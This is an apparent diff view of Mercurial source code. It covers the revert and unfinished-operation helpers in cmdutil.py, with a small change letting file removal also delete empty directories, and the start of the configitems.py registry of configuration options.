2910 check = 1 # check if the existing file differs from target
2913 check = 1 # check if the existing file differs from target
2911 discard = 0 # never do backup
2914 discard = 0 # never do backup
2912 if opts.get('no_backup'):
2915 if opts.get('no_backup'):
2913 backupinteractive = backup = check = discard
2916 backupinteractive = backup = check = discard
2914 if interactive:
2917 if interactive:
2915 dsmodifiedbackup = backupinteractive
2918 dsmodifiedbackup = backupinteractive
2916 else:
2919 else:
2917 dsmodifiedbackup = backup
2920 dsmodifiedbackup = backup
2918 tobackup = set()
2921 tobackup = set()
2919
2922
2920 backupanddel = actions['remove']
2923 backupanddel = actions['remove']
2921 if not opts.get('no_backup'):
2924 if not opts.get('no_backup'):
2922 backupanddel = actions['drop']
2925 backupanddel = actions['drop']
2923
2926
2924 disptable = (
2927 disptable = (
2925 # dispatch table:
2928 # dispatch table:
2926 # file state
2929 # file state
2927 # action
2930 # action
2928 # make backup
2931 # make backup
2929
2932
2930 ## Sets that results that will change file on disk
2933 ## Sets that results that will change file on disk
2931 # Modified compared to target, no local change
2934 # Modified compared to target, no local change
2932 (modified, actions['revert'], discard),
2935 (modified, actions['revert'], discard),
2933 # Modified compared to target, but local file is deleted
2936 # Modified compared to target, but local file is deleted
2934 (deleted, actions['revert'], discard),
2937 (deleted, actions['revert'], discard),
2935 # Modified compared to target, local change
2938 # Modified compared to target, local change
2936 (dsmodified, actions['revert'], dsmodifiedbackup),
2939 (dsmodified, actions['revert'], dsmodifiedbackup),
2937 # Added since target
2940 # Added since target
2938 (added, actions['remove'], discard),
2941 (added, actions['remove'], discard),
2939 # Added in working directory
2942 # Added in working directory
2940 (dsadded, actions['forget'], discard),
2943 (dsadded, actions['forget'], discard),
2941 # Added since target, have local modification
2944 # Added since target, have local modification
2942 (modadded, backupanddel, backup),
2945 (modadded, backupanddel, backup),
2943 # Added since target but file is missing in working directory
2946 # Added since target but file is missing in working directory
2944 (deladded, actions['drop'], discard),
2947 (deladded, actions['drop'], discard),
2945 # Removed since target, before working copy parent
2948 # Removed since target, before working copy parent
2946 (removed, actions['add'], discard),
2949 (removed, actions['add'], discard),
2947 # Same as `removed` but an unknown file exists at the same path
2950 # Same as `removed` but an unknown file exists at the same path
2948 (removunk, actions['add'], check),
2951 (removunk, actions['add'], check),
2949 # Removed since targe, marked as such in working copy parent
2952 # Removed since targe, marked as such in working copy parent
2950 (dsremoved, actions['undelete'], discard),
2953 (dsremoved, actions['undelete'], discard),
2951 # Same as `dsremoved` but an unknown file exists at the same path
2954 # Same as `dsremoved` but an unknown file exists at the same path
2952 (dsremovunk, actions['undelete'], check),
2955 (dsremovunk, actions['undelete'], check),
2953 ## the following sets does not result in any file changes
2956 ## the following sets does not result in any file changes
2954 # File with no modification
2957 # File with no modification
2955 (clean, actions['noop'], discard),
2958 (clean, actions['noop'], discard),
2956 # Existing file, not tracked anywhere
2959 # Existing file, not tracked anywhere
2957 (unknown, actions['unknown'], discard),
2960 (unknown, actions['unknown'], discard),
2958 )
2961 )
2959
2962
2960 for abs, (rel, exact) in sorted(names.items()):
2963 for abs, (rel, exact) in sorted(names.items()):
2961 # target file to be touch on disk (relative to cwd)
2964 # target file to be touch on disk (relative to cwd)
2962 target = repo.wjoin(abs)
2965 target = repo.wjoin(abs)
2963 # search the entry in the dispatch table.
2966 # search the entry in the dispatch table.
2964 # if the file is in any of these sets, it was touched in the working
2967 # if the file is in any of these sets, it was touched in the working
2965 # directory parent and we are sure it needs to be reverted.
2968 # directory parent and we are sure it needs to be reverted.
2966 for table, (xlist, msg), dobackup in disptable:
2969 for table, (xlist, msg), dobackup in disptable:
2967 if abs not in table:
2970 if abs not in table:
2968 continue
2971 continue
2969 if xlist is not None:
2972 if xlist is not None:
2970 xlist.append(abs)
2973 xlist.append(abs)
2971 if dobackup:
2974 if dobackup:
2972 # If in interactive mode, don't automatically create
2975 # If in interactive mode, don't automatically create
2973 # .orig files (issue4793)
2976 # .orig files (issue4793)
2974 if dobackup == backupinteractive:
2977 if dobackup == backupinteractive:
2975 tobackup.add(abs)
2978 tobackup.add(abs)
2976 elif (backup <= dobackup or wctx[abs].cmp(ctx[abs])):
2979 elif (backup <= dobackup or wctx[abs].cmp(ctx[abs])):
2977 bakname = scmutil.origpath(ui, repo, rel)
2980 bakname = scmutil.origpath(ui, repo, rel)
2978 ui.note(_('saving current version of %s as %s\n') %
2981 ui.note(_('saving current version of %s as %s\n') %
2979 (rel, bakname))
2982 (rel, bakname))
2980 if not opts.get('dry_run'):
2983 if not opts.get('dry_run'):
2981 if interactive:
2984 if interactive:
2982 util.copyfile(target, bakname)
2985 util.copyfile(target, bakname)
2983 else:
2986 else:
2984 util.rename(target, bakname)
2987 util.rename(target, bakname)
2985 if ui.verbose or not exact:
2988 if ui.verbose or not exact:
2986 if not isinstance(msg, bytes):
2989 if not isinstance(msg, bytes):
2987 msg = msg(abs)
2990 msg = msg(abs)
2988 ui.status(msg % rel)
2991 ui.status(msg % rel)
2989 elif exact:
2992 elif exact:
2990 ui.warn(msg % rel)
2993 ui.warn(msg % rel)
2991 break
2994 break
2992
2995
2993 if not opts.get('dry_run'):
2996 if not opts.get('dry_run'):
2994 needdata = ('revert', 'add', 'undelete')
2997 needdata = ('revert', 'add', 'undelete')
2995 oplist = [actions[name][0] for name in needdata]
2998 oplist = [actions[name][0] for name in needdata]
2996 prefetch = scmutil.prefetchfiles
2999 prefetch = scmutil.prefetchfiles
2997 matchfiles = scmutil.matchfiles
3000 matchfiles = scmutil.matchfiles
2998 prefetch(repo, [ctx.rev()],
3001 prefetch(repo, [ctx.rev()],
2999 matchfiles(repo,
3002 matchfiles(repo,
3000 [f for sublist in oplist for f in sublist]))
3003 [f for sublist in oplist for f in sublist]))
3001 _performrevert(repo, parents, ctx, actions, interactive, tobackup)
3004 _performrevert(repo, parents, ctx, actions, interactive, tobackup)
3002
3005
3003 if targetsubs:
3006 if targetsubs:
3004 # Revert the subrepos on the revert list
3007 # Revert the subrepos on the revert list
3005 for sub in targetsubs:
3008 for sub in targetsubs:
3006 try:
3009 try:
3007 wctx.sub(sub).revert(ctx.substate[sub], *pats,
3010 wctx.sub(sub).revert(ctx.substate[sub], *pats,
3008 **pycompat.strkwargs(opts))
3011 **pycompat.strkwargs(opts))
3009 except KeyError:
3012 except KeyError:
3010 raise error.Abort("subrepository '%s' does not exist in %s!"
3013 raise error.Abort("subrepository '%s' does not exist in %s!"
3011 % (sub, short(ctx.node())))
3014 % (sub, short(ctx.node())))
3012
3015
3013 def _performrevert(repo, parents, ctx, actions, interactive=False,
3016 def _performrevert(repo, parents, ctx, actions, interactive=False,
3014 tobackup=None):
3017 tobackup=None):
3015 """function that actually perform all the actions computed for revert
3018 """function that actually perform all the actions computed for revert
3016
3019
3017 This is an independent function to let extension to plug in and react to
3020 This is an independent function to let extension to plug in and react to
3018 the imminent revert.
3021 the imminent revert.
3019
3022
3020 Make sure you have the working directory locked when calling this function.
3023 Make sure you have the working directory locked when calling this function.
3021 """
3024 """
3022 parent, p2 = parents
3025 parent, p2 = parents
3023 node = ctx.node()
3026 node = ctx.node()
3024 excluded_files = []
3027 excluded_files = []
3025
3028
3026 def checkout(f):
3029 def checkout(f):
3027 fc = ctx[f]
3030 fc = ctx[f]
3028 repo.wwrite(f, fc.data(), fc.flags())
3031 repo.wwrite(f, fc.data(), fc.flags())
3029
3032
3030 def doremove(f):
3033 def doremove(f):
3031 try:
3034 try:
3032 repo.wvfs.unlinkpath(f)
3035 rmdir = repo.ui.configbool('experimental', 'removeemptydirs')
3036 repo.wvfs.unlinkpath(f, rmdir=rmdir)
3033 except OSError:
3037 except OSError:
3034 pass
3038 pass
3035 repo.dirstate.remove(f)
3039 repo.dirstate.remove(f)
3036
3040
3037 audit_path = pathutil.pathauditor(repo.root, cached=True)
3041 audit_path = pathutil.pathauditor(repo.root, cached=True)
3038 for f in actions['forget'][0]:
3042 for f in actions['forget'][0]:
3039 if interactive:
3043 if interactive:
3040 choice = repo.ui.promptchoice(
3044 choice = repo.ui.promptchoice(
3041 _("forget added file %s (Yn)?$$ &Yes $$ &No") % f)
3045 _("forget added file %s (Yn)?$$ &Yes $$ &No") % f)
3042 if choice == 0:
3046 if choice == 0:
3043 repo.dirstate.drop(f)
3047 repo.dirstate.drop(f)
3044 else:
3048 else:
3045 excluded_files.append(f)
3049 excluded_files.append(f)
3046 else:
3050 else:
3047 repo.dirstate.drop(f)
3051 repo.dirstate.drop(f)
3048 for f in actions['remove'][0]:
3052 for f in actions['remove'][0]:
3049 audit_path(f)
3053 audit_path(f)
3050 if interactive:
3054 if interactive:
3051 choice = repo.ui.promptchoice(
3055 choice = repo.ui.promptchoice(
3052 _("remove added file %s (Yn)?$$ &Yes $$ &No") % f)
3056 _("remove added file %s (Yn)?$$ &Yes $$ &No") % f)
3053 if choice == 0:
3057 if choice == 0:
3054 doremove(f)
3058 doremove(f)
3055 else:
3059 else:
3056 excluded_files.append(f)
3060 excluded_files.append(f)
3057 else:
3061 else:
3058 doremove(f)
3062 doremove(f)
3059 for f in actions['drop'][0]:
3063 for f in actions['drop'][0]:
3060 audit_path(f)
3064 audit_path(f)
3061 repo.dirstate.remove(f)
3065 repo.dirstate.remove(f)
3062
3066
3063 normal = None
3067 normal = None
3064 if node == parent:
3068 if node == parent:
3065 # We're reverting to our parent. If possible, we'd like status
3069 # We're reverting to our parent. If possible, we'd like status
3066 # to report the file as clean. We have to use normallookup for
3070 # to report the file as clean. We have to use normallookup for
3067 # merges to avoid losing information about merged/dirty files.
3071 # merges to avoid losing information about merged/dirty files.
3068 if p2 != nullid:
3072 if p2 != nullid:
3069 normal = repo.dirstate.normallookup
3073 normal = repo.dirstate.normallookup
3070 else:
3074 else:
3071 normal = repo.dirstate.normal
3075 normal = repo.dirstate.normal
3072
3076
3073 newlyaddedandmodifiedfiles = set()
3077 newlyaddedandmodifiedfiles = set()
3074 if interactive:
3078 if interactive:
3075 # Prompt the user for changes to revert
3079 # Prompt the user for changes to revert
3076 torevert = [f for f in actions['revert'][0] if f not in excluded_files]
3080 torevert = [f for f in actions['revert'][0] if f not in excluded_files]
3077 m = scmutil.matchfiles(repo, torevert)
3081 m = scmutil.matchfiles(repo, torevert)
3078 diffopts = patch.difffeatureopts(repo.ui, whitespace=True)
3082 diffopts = patch.difffeatureopts(repo.ui, whitespace=True)
3079 diffopts.nodates = True
3083 diffopts.nodates = True
3080 diffopts.git = True
3084 diffopts.git = True
3081 operation = 'discard'
3085 operation = 'discard'
3082 reversehunks = True
3086 reversehunks = True
3083 if node != parent:
3087 if node != parent:
3084 operation = 'apply'
3088 operation = 'apply'
3085 reversehunks = False
3089 reversehunks = False
3086 if reversehunks:
3090 if reversehunks:
3087 diff = patch.diff(repo, ctx.node(), None, m, opts=diffopts)
3091 diff = patch.diff(repo, ctx.node(), None, m, opts=diffopts)
3088 else:
3092 else:
3089 diff = patch.diff(repo, None, ctx.node(), m, opts=diffopts)
3093 diff = patch.diff(repo, None, ctx.node(), m, opts=diffopts)
3090 originalchunks = patch.parsepatch(diff)
3094 originalchunks = patch.parsepatch(diff)
3091
3095
3092 try:
3096 try:
3093
3097
3094 chunks, opts = recordfilter(repo.ui, originalchunks,
3098 chunks, opts = recordfilter(repo.ui, originalchunks,
3095 operation=operation)
3099 operation=operation)
3096 if reversehunks:
3100 if reversehunks:
3097 chunks = patch.reversehunks(chunks)
3101 chunks = patch.reversehunks(chunks)
3098
3102
3099 except error.PatchError as err:
3103 except error.PatchError as err:
3100 raise error.Abort(_('error parsing patch: %s') % err)
3104 raise error.Abort(_('error parsing patch: %s') % err)
3101
3105
3102 newlyaddedandmodifiedfiles = newandmodified(chunks, originalchunks)
3106 newlyaddedandmodifiedfiles = newandmodified(chunks, originalchunks)
3103 if tobackup is None:
3107 if tobackup is None:
3104 tobackup = set()
3108 tobackup = set()
3105 # Apply changes
3109 # Apply changes
3106 fp = stringio()
3110 fp = stringio()
3107 for c in chunks:
3111 for c in chunks:
3108 # Create a backup file only if this hunk should be backed up
3112 # Create a backup file only if this hunk should be backed up
3109 if ishunk(c) and c.header.filename() in tobackup:
3113 if ishunk(c) and c.header.filename() in tobackup:
3110 abs = c.header.filename()
3114 abs = c.header.filename()
3111 target = repo.wjoin(abs)
3115 target = repo.wjoin(abs)
3112 bakname = scmutil.origpath(repo.ui, repo, m.rel(abs))
3116 bakname = scmutil.origpath(repo.ui, repo, m.rel(abs))
3113 util.copyfile(target, bakname)
3117 util.copyfile(target, bakname)
3114 tobackup.remove(abs)
3118 tobackup.remove(abs)
3115 c.write(fp)
3119 c.write(fp)
3116 dopatch = fp.tell()
3120 dopatch = fp.tell()
3117 fp.seek(0)
3121 fp.seek(0)
3118 if dopatch:
3122 if dopatch:
3119 try:
3123 try:
3120 patch.internalpatch(repo.ui, repo, fp, 1, eolmode=None)
3124 patch.internalpatch(repo.ui, repo, fp, 1, eolmode=None)
3121 except error.PatchError as err:
3125 except error.PatchError as err:
3122 raise error.Abort(pycompat.bytestr(err))
3126 raise error.Abort(pycompat.bytestr(err))
3123 del fp
3127 del fp
3124 else:
3128 else:
3125 for f in actions['revert'][0]:
3129 for f in actions['revert'][0]:
3126 checkout(f)
3130 checkout(f)
3127 if normal:
3131 if normal:
3128 normal(f)
3132 normal(f)
3129
3133
3130 for f in actions['add'][0]:
3134 for f in actions['add'][0]:
3131 # Don't checkout modified files, they are already created by the diff
3135 # Don't checkout modified files, they are already created by the diff
3132 if f not in newlyaddedandmodifiedfiles:
3136 if f not in newlyaddedandmodifiedfiles:
3133 checkout(f)
3137 checkout(f)
3134 repo.dirstate.add(f)
3138 repo.dirstate.add(f)
3135
3139
3136 normal = repo.dirstate.normallookup
3140 normal = repo.dirstate.normallookup
3137 if node == parent and p2 == nullid:
3141 if node == parent and p2 == nullid:
3138 normal = repo.dirstate.normal
3142 normal = repo.dirstate.normal
3139 for f in actions['undelete'][0]:
3143 for f in actions['undelete'][0]:
3140 checkout(f)
3144 checkout(f)
3141 normal(f)
3145 normal(f)
3142
3146
3143 copied = copies.pathcopies(repo[parent], ctx)
3147 copied = copies.pathcopies(repo[parent], ctx)
3144
3148
3145 for f in actions['add'][0] + actions['undelete'][0] + actions['revert'][0]:
3149 for f in actions['add'][0] + actions['undelete'][0] + actions['revert'][0]:
3146 if f in copied:
3150 if f in copied:
3147 repo.dirstate.copy(copied[f], f)
3151 repo.dirstate.copy(copied[f], f)
3148
3152
3149 # a list of (ui, repo, otherpeer, opts, missing) functions called by
3153 # a list of (ui, repo, otherpeer, opts, missing) functions called by
3150 # commands.outgoing. "missing" is "missing" of the result of
3154 # commands.outgoing. "missing" is "missing" of the result of
3151 # "findcommonoutgoing()"
3155 # "findcommonoutgoing()"
3152 outgoinghooks = util.hooks()
3156 outgoinghooks = util.hooks()
3153
3157
3154 # a list of (ui, repo) functions called by commands.summary
3158 # a list of (ui, repo) functions called by commands.summary
3155 summaryhooks = util.hooks()
3159 summaryhooks = util.hooks()
3156
3160
3157 # a list of (ui, repo, opts, changes) functions called by commands.summary.
3161 # a list of (ui, repo, opts, changes) functions called by commands.summary.
3158 #
3162 #
3159 # functions should return tuple of booleans below, if 'changes' is None:
3163 # functions should return tuple of booleans below, if 'changes' is None:
3160 # (whether-incomings-are-needed, whether-outgoings-are-needed)
3164 # (whether-incomings-are-needed, whether-outgoings-are-needed)
3161 #
3165 #
3162 # otherwise, 'changes' is a tuple of tuples below:
3166 # otherwise, 'changes' is a tuple of tuples below:
3163 # - (sourceurl, sourcebranch, sourcepeer, incoming)
3167 # - (sourceurl, sourcebranch, sourcepeer, incoming)
3164 # - (desturl, destbranch, destpeer, outgoing)
3168 # - (desturl, destbranch, destpeer, outgoing)
3165 summaryremotehooks = util.hooks()
3169 summaryremotehooks = util.hooks()
3166
3170
3167 # A list of state files kept by multistep operations like graft.
3171 # A list of state files kept by multistep operations like graft.
3168 # Since graft cannot be aborted, it is considered 'clearable' by update.
3172 # Since graft cannot be aborted, it is considered 'clearable' by update.
3169 # note: bisect is intentionally excluded
3173 # note: bisect is intentionally excluded
3170 # (state file, clearable, allowcommit, error, hint)
3174 # (state file, clearable, allowcommit, error, hint)
3171 unfinishedstates = [
3175 unfinishedstates = [
3172 ('graftstate', True, False, _('graft in progress'),
3176 ('graftstate', True, False, _('graft in progress'),
3173 _("use 'hg graft --continue' or 'hg graft --stop' to stop")),
3177 _("use 'hg graft --continue' or 'hg graft --stop' to stop")),
3174 ('updatestate', True, False, _('last update was interrupted'),
3178 ('updatestate', True, False, _('last update was interrupted'),
3175 _("use 'hg update' to get a consistent checkout"))
3179 _("use 'hg update' to get a consistent checkout"))
3176 ]
3180 ]
3177
3181
3178 def checkunfinished(repo, commit=False):
3182 def checkunfinished(repo, commit=False):
3179 '''Look for an unfinished multistep operation, like graft, and abort
3183 '''Look for an unfinished multistep operation, like graft, and abort
3180 if found. It's probably good to check this right before
3184 if found. It's probably good to check this right before
3181 bailifchanged().
3185 bailifchanged().
3182 '''
3186 '''
3183 # Check for non-clearable states first, so things like rebase will take
3187 # Check for non-clearable states first, so things like rebase will take
3184 # precedence over update.
3188 # precedence over update.
3185 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3189 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3186 if clearable or (commit and allowcommit):
3190 if clearable or (commit and allowcommit):
3187 continue
3191 continue
3188 if repo.vfs.exists(f):
3192 if repo.vfs.exists(f):
3189 raise error.Abort(msg, hint=hint)
3193 raise error.Abort(msg, hint=hint)
3190
3194
3191 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3195 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3192 if not clearable or (commit and allowcommit):
3196 if not clearable or (commit and allowcommit):
3193 continue
3197 continue
3194 if repo.vfs.exists(f):
3198 if repo.vfs.exists(f):
3195 raise error.Abort(msg, hint=hint)
3199 raise error.Abort(msg, hint=hint)
3196
3200
3197 def clearunfinished(repo):
3201 def clearunfinished(repo):
3198 '''Check for unfinished operations (as above), and clear the ones
3202 '''Check for unfinished operations (as above), and clear the ones
3199 that are clearable.
3203 that are clearable.
3200 '''
3204 '''
3201 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3205 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3202 if not clearable and repo.vfs.exists(f):
3206 if not clearable and repo.vfs.exists(f):
3203 raise error.Abort(msg, hint=hint)
3207 raise error.Abort(msg, hint=hint)
3204 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3208 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3205 if clearable and repo.vfs.exists(f):
3209 if clearable and repo.vfs.exists(f):
3206 util.unlink(repo.vfs.join(f))
3210 util.unlink(repo.vfs.join(f))
3207
3211
3208 afterresolvedstates = [
3212 afterresolvedstates = [
3209 ('graftstate',
3213 ('graftstate',
3210 _('hg graft --continue')),
3214 _('hg graft --continue')),
3211 ]
3215 ]
3212
3216
3213 def howtocontinue(repo):
3217 def howtocontinue(repo):
3214 '''Check for an unfinished operation and return the command to finish
3218 '''Check for an unfinished operation and return the command to finish
3215 it.
3219 it.
3216
3220
3217 afterresolvedstates tuples define a .hg/{file} and the corresponding
3221 afterresolvedstates tuples define a .hg/{file} and the corresponding
3218 command needed to finish it.
3222 command needed to finish it.
3219
3223
3220 Returns a (msg, warning) tuple. 'msg' is a string and 'warning' is
3224 Returns a (msg, warning) tuple. 'msg' is a string and 'warning' is
3221 a boolean.
3225 a boolean.
3222 '''
3226 '''
3223 contmsg = _("continue: %s")
3227 contmsg = _("continue: %s")
3224 for f, msg in afterresolvedstates:
3228 for f, msg in afterresolvedstates:
3225 if repo.vfs.exists(f):
3229 if repo.vfs.exists(f):
3226 return contmsg % msg, True
3230 return contmsg % msg, True
3227 if repo[None].dirty(missing=True, merge=False, branch=False):
3231 if repo[None].dirty(missing=True, merge=False, branch=False):
3228 return contmsg % _("hg commit"), False
3232 return contmsg % _("hg commit"), False
3229 return None, None
3233 return None, None
3230
3234
3231 def checkafterresolved(repo):
3235 def checkafterresolved(repo):
3232 '''Inform the user about the next action after completing hg resolve
3236 '''Inform the user about the next action after completing hg resolve
3233
3237
3234 If there's a matching afterresolvedstates, howtocontinue will yield
3238 If there's a matching afterresolvedstates, howtocontinue will yield
3235 repo.ui.warn as the reporter.
3239 repo.ui.warn as the reporter.
3236
3240
3237 Otherwise, it will yield repo.ui.note.
3241 Otherwise, it will yield repo.ui.note.
3238 '''
3242 '''
3239 msg, warning = howtocontinue(repo)
3243 msg, warning = howtocontinue(repo)
3240 if msg is not None:
3244 if msg is not None:
3241 if warning:
3245 if warning:
3242 repo.ui.warn("%s\n" % msg)
3246 repo.ui.warn("%s\n" % msg)
3243 else:
3247 else:
3244 repo.ui.note("%s\n" % msg)
3248 repo.ui.note("%s\n" % msg)
3245
3249
3246 def wrongtooltocontinue(repo, task):
3250 def wrongtooltocontinue(repo, task):
3247 '''Raise an abort suggesting how to properly continue if there is an
3251 '''Raise an abort suggesting how to properly continue if there is an
3248 active task.
3252 active task.
3249
3253
3250 Uses howtocontinue() to find the active task.
3254 Uses howtocontinue() to find the active task.
3251
3255
3252 If there's no task (repo.ui.note for 'hg commit'), it does not offer
3256 If there's no task (repo.ui.note for 'hg commit'), it does not offer
3253 a hint.
3257 a hint.
3254 '''
3258 '''
3255 after = howtocontinue(repo)
3259 after = howtocontinue(repo)
3256 hint = None
3260 hint = None
3257 if after[1]:
3261 if after[1]:
3258 hint = after[0]
3262 hint = after[0]
3259 raise error.Abort(_('no %s in progress') % task, hint=hint)
3263 raise error.Abort(_('no %s in progress') % task, hint=hint)
@@ -1,1352 +1,1355 b''
1 # configitems.py - centralized declaration of configuration option
1 # configitems.py - centralized declaration of configuration option
2 #
2 #
3 # Copyright 2017 Pierre-Yves David <pierre-yves.david@octobus.net>
3 # Copyright 2017 Pierre-Yves David <pierre-yves.david@octobus.net>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import functools
10 import functools
11 import re
11 import re
12
12
13 from . import (
13 from . import (
14 encoding,
14 encoding,
15 error,
15 error,
16 )
16 )
17
17
18 def loadconfigtable(ui, extname, configtable):
18 def loadconfigtable(ui, extname, configtable):
19 """update config item known to the ui with the extension ones"""
19 """update config item known to the ui with the extension ones"""
20 for section, items in sorted(configtable.items()):
20 for section, items in sorted(configtable.items()):
21 knownitems = ui._knownconfig.setdefault(section, itemregister())
21 knownitems = ui._knownconfig.setdefault(section, itemregister())
22 knownkeys = set(knownitems)
22 knownkeys = set(knownitems)
23 newkeys = set(items)
23 newkeys = set(items)
24 for key in sorted(knownkeys & newkeys):
24 for key in sorted(knownkeys & newkeys):
25 msg = "extension '%s' overwrite config item '%s.%s'"
25 msg = "extension '%s' overwrite config item '%s.%s'"
26 msg %= (extname, section, key)
26 msg %= (extname, section, key)
27 ui.develwarn(msg, config='warn-config')
27 ui.develwarn(msg, config='warn-config')
28
28
29 knownitems.update(items)
29 knownitems.update(items)
30
30
31 class configitem(object):
31 class configitem(object):
32 """represent a known config item
32 """represent a known config item
33
33
34 :section: the official config section where to find this item,
34 :section: the official config section where to find this item,
35 :name: the official name within the section,
35 :name: the official name within the section,
36 :default: default value for this item,
36 :default: default value for this item,
37 :alias: optional list of tuples as alternatives,
37 :alias: optional list of tuples as alternatives,
38 :generic: this is a generic definition, match name using regular expression.
38 :generic: this is a generic definition, match name using regular expression.
39 """
39 """
40
40
41 def __init__(self, section, name, default=None, alias=(),
41 def __init__(self, section, name, default=None, alias=(),
42 generic=False, priority=0):
42 generic=False, priority=0):
43 self.section = section
43 self.section = section
44 self.name = name
44 self.name = name
45 self.default = default
45 self.default = default
46 self.alias = list(alias)
46 self.alias = list(alias)
47 self.generic = generic
47 self.generic = generic
48 self.priority = priority
48 self.priority = priority
49 self._re = None
49 self._re = None
50 if generic:
50 if generic:
51 self._re = re.compile(self.name)
51 self._re = re.compile(self.name)
52
52
53 class itemregister(dict):
53 class itemregister(dict):
54 """A specialized dictionary that can handle wild-card selection"""
54 """A specialized dictionary that can handle wild-card selection"""
55
55
56 def __init__(self):
56 def __init__(self):
57 super(itemregister, self).__init__()
57 super(itemregister, self).__init__()
58 self._generics = set()
58 self._generics = set()
59
59
60 def update(self, other):
60 def update(self, other):
61 super(itemregister, self).update(other)
61 super(itemregister, self).update(other)
62 self._generics.update(other._generics)
62 self._generics.update(other._generics)
63
63
64 def __setitem__(self, key, item):
64 def __setitem__(self, key, item):
65 super(itemregister, self).__setitem__(key, item)
65 super(itemregister, self).__setitem__(key, item)
66 if item.generic:
66 if item.generic:
67 self._generics.add(item)
67 self._generics.add(item)
68
68
69 def get(self, key):
69 def get(self, key):
70 baseitem = super(itemregister, self).get(key)
70 baseitem = super(itemregister, self).get(key)
71 if baseitem is not None and not baseitem.generic:
71 if baseitem is not None and not baseitem.generic:
72 return baseitem
72 return baseitem
73
73
74 # search for a matching generic item
74 # search for a matching generic item
75 generics = sorted(self._generics, key=(lambda x: (x.priority, x.name)))
75 generics = sorted(self._generics, key=(lambda x: (x.priority, x.name)))
76 for item in generics:
76 for item in generics:
77 # we use 'match' instead of 'search' to make the matching simpler
77 # we use 'match' instead of 'search' to make the matching simpler
78 # for people unfamiliar with regular expression. Having the match
78 # for people unfamiliar with regular expression. Having the match
79 # rooted to the start of the string will produce less surprising
79 # rooted to the start of the string will produce less surprising
80 # result for user writing simple regex for sub-attribute.
80 # result for user writing simple regex for sub-attribute.
81 #
81 #
82 # For example using "color\..*" match produces an unsurprising
82 # For example using "color\..*" match produces an unsurprising
83 # result, while using search could suddenly match apparently
83 # result, while using search could suddenly match apparently
84 # unrelated configuration that happens to contains "color."
84 # unrelated configuration that happens to contains "color."
85 # anywhere. This is a tradeoff where we favor requiring ".*" on
85 # anywhere. This is a tradeoff where we favor requiring ".*" on
86 # some match to avoid the need to prefix most pattern with "^".
86 # some match to avoid the need to prefix most pattern with "^".
87 # The "^" seems more error prone.
87 # The "^" seems more error prone.
88 if item._re.match(key):
88 if item._re.match(key):
89 return item
89 return item
90
90
91 return None
91 return None
92
92
93 coreitems = {}
93 coreitems = {}
94
94
95 def _register(configtable, *args, **kwargs):
95 def _register(configtable, *args, **kwargs):
96 item = configitem(*args, **kwargs)
96 item = configitem(*args, **kwargs)
97 section = configtable.setdefault(item.section, itemregister())
97 section = configtable.setdefault(item.section, itemregister())
98 if item.name in section:
98 if item.name in section:
99 msg = "duplicated config item registration for '%s.%s'"
99 msg = "duplicated config item registration for '%s.%s'"
100 raise error.ProgrammingError(msg % (item.section, item.name))
100 raise error.ProgrammingError(msg % (item.section, item.name))
101 section[item.name] = item
101 section[item.name] = item
102
102
103 # special value for case where the default is derived from other values
103 # special value for case where the default is derived from other values
104 dynamicdefault = object()
104 dynamicdefault = object()
105
105
106 # Registering actual config items
106 # Registering actual config items
107
107
108 def getitemregister(configtable):
108 def getitemregister(configtable):
109 f = functools.partial(_register, configtable)
109 f = functools.partial(_register, configtable)
110 # export pseudo enum as configitem.*
110 # export pseudo enum as configitem.*
111 f.dynamicdefault = dynamicdefault
111 f.dynamicdefault = dynamicdefault
112 return f
112 return f
113
113
114 coreconfigitem = getitemregister(coreitems)
114 coreconfigitem = getitemregister(coreitems)
115
115
116 coreconfigitem('alias', '.*',
116 coreconfigitem('alias', '.*',
117 default=dynamicdefault,
117 default=dynamicdefault,
118 generic=True,
118 generic=True,
119 )
119 )
120 coreconfigitem('annotate', 'nodates',
120 coreconfigitem('annotate', 'nodates',
121 default=False,
121 default=False,
122 )
122 )
123 coreconfigitem('annotate', 'showfunc',
123 coreconfigitem('annotate', 'showfunc',
124 default=False,
124 default=False,
125 )
125 )
126 coreconfigitem('annotate', 'unified',
126 coreconfigitem('annotate', 'unified',
127 default=None,
127 default=None,
128 )
128 )
129 coreconfigitem('annotate', 'git',
129 coreconfigitem('annotate', 'git',
130 default=False,
130 default=False,
131 )
131 )
132 coreconfigitem('annotate', 'ignorews',
132 coreconfigitem('annotate', 'ignorews',
133 default=False,
133 default=False,
134 )
134 )
135 coreconfigitem('annotate', 'ignorewsamount',
135 coreconfigitem('annotate', 'ignorewsamount',
136 default=False,
136 default=False,
137 )
137 )
138 coreconfigitem('annotate', 'ignoreblanklines',
138 coreconfigitem('annotate', 'ignoreblanklines',
139 default=False,
139 default=False,
140 )
140 )
141 coreconfigitem('annotate', 'ignorewseol',
141 coreconfigitem('annotate', 'ignorewseol',
142 default=False,
142 default=False,
143 )
143 )
144 coreconfigitem('annotate', 'nobinary',
144 coreconfigitem('annotate', 'nobinary',
145 default=False,
145 default=False,
146 )
146 )
147 coreconfigitem('annotate', 'noprefix',
147 coreconfigitem('annotate', 'noprefix',
148 default=False,
148 default=False,
149 )
149 )
150 coreconfigitem('auth', 'cookiefile',
150 coreconfigitem('auth', 'cookiefile',
151 default=None,
151 default=None,
152 )
152 )
153 # bookmarks.pushing: internal hack for discovery
153 # bookmarks.pushing: internal hack for discovery
154 coreconfigitem('bookmarks', 'pushing',
154 coreconfigitem('bookmarks', 'pushing',
155 default=list,
155 default=list,
156 )
156 )
157 # bundle.mainreporoot: internal hack for bundlerepo
157 # bundle.mainreporoot: internal hack for bundlerepo
158 coreconfigitem('bundle', 'mainreporoot',
158 coreconfigitem('bundle', 'mainreporoot',
159 default='',
159 default='',
160 )
160 )
161 # bundle.reorder: experimental config
161 # bundle.reorder: experimental config
162 coreconfigitem('bundle', 'reorder',
162 coreconfigitem('bundle', 'reorder',
163 default='auto',
163 default='auto',
164 )
164 )
165 coreconfigitem('censor', 'policy',
165 coreconfigitem('censor', 'policy',
